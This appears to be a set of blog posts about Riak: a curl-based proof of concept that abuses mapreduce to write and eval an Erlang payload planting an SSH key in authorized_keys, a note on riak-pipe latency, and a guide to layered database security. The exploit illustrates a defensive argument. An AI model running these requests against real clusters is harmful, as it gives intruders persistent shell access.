curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"] ], "query": [ {"map": { "language": "javascript", "source": " function(v) { // "/tmp/evil.erl" return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "write_file", "arg": " SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n SSH = SSHDir ++ \"authorized_keys\".\n filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n file:change_mode(SSHDir, 8#700).\n file:change_mode(SSH, 8#600).\n file:delete(\"/tmp/evil.erl\"). " }} ] } EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_hosts.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"]], "query": [ {"map": { "language": "javascript", "source": " function(v) { return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "path_eval", "arg": "/tmp/evil.erl", }} ] }

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

As a part of the exciting series of events (long story...) around our riak cluster this week, we switched over to riak-pipe mapreduce. Usually, when a node is down mapreduce times shoot through the roof, which causes slow behavior and even timeouts on the API. Riak-pipe changes that: our API latency for mapreduce-heavy requests like feeds and comments fell from 3-7 seconds to a stable 600ms. Still high, but at least tolerable.

mapred.png

[Update] I should also mention that riak-pipe MR throws about a thousand apparently random, recoverable errors per day. Things like

map_reduce_error

with no explanation in the logs, or

{"lineno":466,"message":"SyntaxError: syntax error","source":"()"}

when the source is definitely not "()". Still haven't figured out why, but it seems vaguely node-dependent.

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the proscribed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. Oauth providers (like Facebook and Twitter), or OpenID also approach web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and have less ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employee's salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usenames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Lets sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.

We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.

Naturally, this only works for certain operations. Mapreduce, for instance, excecutes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)

Copyright © 2015 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.